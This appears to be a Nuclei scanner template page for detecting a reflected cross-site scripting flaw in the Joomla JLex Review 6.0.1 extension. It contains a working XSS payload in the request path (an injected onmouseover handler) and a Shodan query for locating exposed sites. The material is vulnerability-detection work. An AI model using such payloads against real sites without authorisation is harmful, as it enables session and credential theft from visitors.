Skip to content

Joomla JLex Review 6.0.1 - Cross-Site Scripting

ID: joomla-jlex-xss

Severity: medium

Author: r3Y3r53

Tags: joomla,xss

The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim’s session token or login credentials.

id: joomla-jlex-xss
info:
name: Joomla JLex Review 6.0.1 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
reference:
- https://www.exploitalert.com/view-details.html?id=39732
- https://www.exploit-db.com/exploits/51645
- https://extensions.joomla.org/extension/jlex-review/
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-1950415971
tags: joomla,xss
http:
- method: GET
path:
- "{{BaseURL}}/?review_id=1&itwed%22onmouseover=%22confirm(document.domain)%22style=%22position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b%22b7yzn=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<a href="/?itwed"onmouseover="confirm(document.domain)"style='
- 'jlex-review'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100f0472684c0e8775f25fec3e56d25983bc864f27cb0fe48f292b8a9dfb0e6ec9302202f90cf854f436a5fc94663b84667d8d7a584c5ecc0122b56cc994f491ce8bcb7:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/joomla-jlex-review-xss.yaml"

View on Github